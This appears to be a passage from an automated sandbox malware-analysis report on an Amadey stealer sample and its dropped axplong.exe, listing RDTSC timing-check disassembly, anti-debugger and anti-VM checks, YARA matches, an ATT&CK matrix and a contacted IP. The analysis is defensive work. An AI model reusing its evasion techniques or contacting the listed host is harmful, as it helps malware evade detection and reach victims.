                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50E080F second address: 50E084D instructions: 0x00000000 rdtsc 0x00000002 mov di, ax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 xchg eax, edi 0x00000009 jmp 00007FE5B8F4A754h 0x0000000e push eax 0x0000000f jmp 00007FE5B8F4A74Bh 0x00000014 xchg eax, edi 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FE5B8F4A750h 0x0000001e rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50E084D second address: 50E0851 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50E0851 second address: 50E0857 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50E0857 second address: 50E088B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE5B8D9CB5Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [76FAB370h] 0x0000000e jmp 00007FE5B8D9CB60h 0x00000013 xor dword ptr [ebp-08h], eax 0x00000016 pushad 0x00000017 popad 0x00000018 xor eax, ebp 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50E088B second address: 50E0891 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50E0891 second address: 50E08C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop edx 0x00000005 call 00007FE5B8D9CB62h 0x0000000a pop ecx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push esp 0x0000000f pushad 0x00000010 mov ax, C7D3h 0x00000014 popad 0x00000015 mov dword ptr [esp], eax 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b mov ax, 507Dh 0x0000001f mov eax, 2F417779h 0x00000024 popad 0x00000025 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50E08C3 second address: 50E0941 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FE5B8F4A755h 0x00000009 sub eax, 564ED046h 0x0000000f jmp 00007FE5B8F4A751h 0x00000014 popfd 0x00000015 jmp 00007FE5B8F4A750h 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d lea eax, dword ptr [ebp-10h] 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 pushfd 0x00000024 jmp 00007FE5B8F4A74Dh 0x00000029 or al, 00000056h 0x0000002c jmp 00007FE5B8F4A751h 0x00000031 popfd 0x00000032 jmp 00007FE5B8F4A750h 0x00000037 popad 0x00000038 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50E0941 second address: 50E0953 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE5B8D9CB5Eh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50E0953 second address: 50E0966 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr fs:[00000000h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50E0966 second address: 50E096D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50E096D second address: 50E0A2F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE5B8F4A755h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, dword ptr [ebp+08h] 0x0000000c pushad 0x0000000d mov si, B723h 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007FE5B8F4A755h 0x00000018 adc esi, 42B22F26h 0x0000001e jmp 00007FE5B8F4A751h 0x00000023 popfd 0x00000024 popad 0x00000025 popad 0x00000026 mov eax, dword ptr [esi+10h] 0x00000029 jmp 00007FE5B8F4A74Eh 0x0000002e test eax, eax 0x00000030 jmp 00007FE5B8F4A750h 0x00000035 jne 00007FE62AD19A88h 0x0000003b pushad 0x0000003c push eax 0x0000003d movsx edx, ax 0x00000040 pop eax 0x00000041 mov si, di 0x00000044 popad 0x00000045 mov eax, 00000000h 0x0000004a push eax 0x0000004b push edx 0x0000004c pushad 0x0000004d pushad 0x0000004e popad 0x0000004f pushfd 0x00000050 jmp 00007FE5B8F4A759h 0x00000055 or eax, 32DCDB46h 0x0000005b jmp 00007FE5B8F4A751h 0x00000060 popfd 0x00000061 popad 0x00000062 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50E0A2F second address: 50E0A35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50E0A35 second address: 50E0A39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50E0A39 second address: 50E0A3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50E0A3D second address: 50E0A62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [ebp-20h], eax 0x0000000b jmp 00007FE5B8F4A74Fh 0x00000010 mov ebx, dword ptr [esi] 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 mov ax, bx 0x00000018 pushad 0x00000019 popad 0x0000001a popad 0x0000001b rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50E0A62 second address: 50E0A68 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50E0A68 second address: 50E0A6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50E0A6C second address: 50E0A89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [ebp-24h], ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007FE5B8D9CB5Dh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50E0A89 second address: 50E0A8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50E0A8E second address: 50E0A9C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE5B8D9CB5Ah 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 50E0061 second address: 50E0066 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: 8A7155 second address: 8A715B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: 8A715B second address: 8A717D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE5B8F4A754h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c jo 00007FE5B8F4A746h 0x00000012 pop ecx 0x00000013 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: 8A7473 second address: 8A7479 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: 8A7722 second address: 8A773E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE5B8F4A758h 0x00000009 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: 8A7479 second address: 8A748C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 jp 00007FE5B8F4A75Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: 8A748C second address: 8A7490 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: 8A7490 second address: 8A7496 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: 8A7722 second address: 8A773E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE5B8D9CB68h 0x00000009 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: 8A8293 second address: 8A8299 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: 8A8299 second address: 8A82B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FE5B8D9CB66h 0x0000000c rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: 8A82B6 second address: 8A82CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnl 00007FE5B8F4A746h 0x0000000e jnp 00007FE5B8F4A746h 0x00000014 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: 8A82CA second address: 8A82D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: 89C57B second address: 89C581 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: 871734 second address: 871749 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE5B8D9CB61h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: 871749 second address: 87174F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: 87174F second address: 871755 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Tries to evade debugger and weak emulator (self modifying code)
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeSpecial instruction interceptor: First address: 7BEA73 instructions caused by: Self-modifying code
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeSpecial instruction interceptor: First address: 95CDEC instructions caused by: Self-modifying code
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeSpecial instruction interceptor: First address: 95CADA instructions caused by: Self-modifying code
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeSpecial instruction interceptor: First address: 985B9D instructions caused by: Self-modifying code
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeSpecial instruction interceptor: First address: 9EDF44 instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSpecial instruction interceptor: First address: 70EA73 instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSpecial instruction interceptor: First address: 8ACDEC instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSpecial instruction interceptor: First address: 8ACADA instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSpecial instruction interceptor: First address: 8D5B9D instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSpecial instruction interceptor: First address: 93DF44 instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeCode function: 0_2_05130B6A rdtsc 0_2_05130B6A
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeThread delayed: delay time: 180000Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow / User API: threadDelayed 405Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7900Thread sleep count: 38 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7900Thread sleep time: -76038s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7860Thread sleep count: 405 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7860Thread sleep time: -12150000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7992Thread sleep time: -360000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7884Thread sleep count: 34 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7884Thread sleep time: -68034s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7860Thread sleep time: -30000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeLast function: Thread delayed
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeThread delayed: delay time: 30000Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeThread delayed: delay time: 180000Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeThread delayed: delay time: 30000Jump to behavior
                    Source: axplong.exe, axplong.exe, 00000007.00000002.3247568585.000000000088D000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                    Source: axplong.exe, 00000007.00000002.3248149591.0000000001299000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: axplong.exe, 00000007.00000002.3248149591.000000000126D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWH
                    Source: EXyAlLKIck.exe, 00000000.00000002.2055040575.000000000093D000.00000040.00000001.01000000.00000003.sdmp, axplong.exe, 00000002.00000002.2085188988.000000000088D000.00000040.00000001.01000000.00000007.sdmp, axplong.exe, 00000003.00000002.2085933555.000000000088D000.00000040.00000001.01000000.00000007.sdmp, axplong.exe, 00000007.00000002.3247568585.000000000088D000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeSystem information queried: ModuleInformationJump to behavior
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeProcess information queried: ProcessInformationJump to behavior

                    Anti Debugging

                    barindex
                    Hides threads from debuggers
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeThread information set: HideFromDebuggerJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeThread information set: HideFromDebuggerJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeThread information set: HideFromDebuggerJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeThread information set: HideFromDebuggerJump to behavior
                    Tries to detect sandboxes and other dynamic analysis tools (window names)
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: regmonclass
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: gbdyllo
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: procmon_window_class
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: ollydbg
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: filemonclass
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: NTICE
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: SICE
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: SIWVID
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeCode function: 0_2_05130B6A rdtsc 0_2_05130B6A
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 7_2_006D645B mov eax, dword ptr fs:[00000030h]7_2_006D645B
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 7_2_006DA1C2 mov eax, dword ptr fs:[00000030h]7_2_006DA1C2
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeProcess created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe" Jump to behavior
                    Source: axplong.exe, axplong.exe, 00000007.00000002.3247568585.000000000088D000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: Program Manager
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 7_2_006BD312 cpuid 7_2_006BD312
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 7_2_006BCB1A GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,7_2_006BCB1A
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 7_2_006A65B0 LookupAccountNameA,7_2_006A65B0

                    Stealing of Sensitive Information

                    barindex
                    Yara detected Amadeys stealer DLL
                    Source: Yara matchFile source: 7.2.axplong.exe.6a0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.EXyAlLKIck.exe.750000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.axplong.exe.6a0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.axplong.exe.6a0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000003.2014529476.0000000004F20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.2085097235.00000000006A1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000003.2045418136.0000000004A30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2054954455.0000000000751000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000003.2671343641.00000000050D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.2085839344.00000000006A1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000003.2044771326.0000000004E90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.3247456508.00000000006A1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                    Command and Scripting Interpreter                    		1
                    Scheduled Task/Job                    		12
                    Process Injection                    		1
                    Masquerading                    		OS Credential Dumping1
                    System Time Discovery                    		Remote Services1
                    Archive Collected Data                    		1
                    Encrypted Channel                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts1
                    Scheduled Task/Job                    		1
                    DLL Side-Loading                    		1
                    Scheduled Task/Job                    		251
                    Virtualization/Sandbox Evasion                    		LSASS Memory641
                    Security Software Discovery                    		Remote Desktop ProtocolData from Removable Media1
                    Ingress Tool Transfer                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                    DLL Side-Loading                    		12
                    Process Injection                    		Security Account Manager2
                    Process Discovery                    		SMB/Windows Admin SharesData from Network Shared Drive2
                    Non-Application Layer Protocol                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
                    Obfuscated Files or Information                    		NTDS251
                    Virtualization/Sandbox Evasion                    		Distributed Component Object ModelInput Capture12
                    Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
                    Software Packing                    		LSA Secrets1
                    Application Window Discovery                    		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    DLL Side-Loading                    		Cached Domain Credentials1
                    Account Discovery                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync1
                    System Owner/User Discovery                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
                    File and Directory Discovery                    		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow224
                    System Information Discovery                    		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1483002 Sample: EXyAlLKIck.exe Startdate: 26/07/2024 Architecture: WINDOWS Score: 100 23 206.23.85.13.in-addr.arpa 2->23 33 Found malware configuration 2->33 35 Antivirus detection for URL or domain 2->35 37 Antivirus / Scanner detection for submitted sample 2->37 39 5 other signatures 2->39 7 EXyAlLKIck.exe 5 2->7         started        11 axplong.exe 2->11         started        13 axplong.exe 12 2->13         started        signatures3 process4 dnsIp5 19 C:\Users\user\AppData\Local\...\axplong.exe, PE32 7->19 dropped 21 C:\Users\user\...\axplong.exe:Zone.Identifier, ASCII 7->21 dropped 41 Detected unpacking (changes PE section rights) 7->41 43 Tries to evade debugger and weak emulator (self modifying code) 7->43 45 Tries to detect virtualization through RDTSC time measurements 7->45 16 axplong.exe 7->16         started        47 Antivirus detection for dropped file 11->47 49 Tries to detect sandboxes and other dynamic analysis tools (window names) 11->49 51 Machine Learning detection for dropped file 11->51 25 185.215.113.16, 53647, 53648, 53649 WHOLESALECONNECTIONSNL Portugal 13->25 53 Hides threads from debuggers 13->53 55 Tries to detect sandboxes / dynamic malware analysis system (registry check) 13->55 57 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 13->57 file6 signatures7 process8 signatures9 27 Hides threads from debuggers 16->27 29 Tries to detect sandboxes / dynamic malware analysis system (registry check) 16->29 31 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 16->31

                    Screenshots

                    Thumbnails

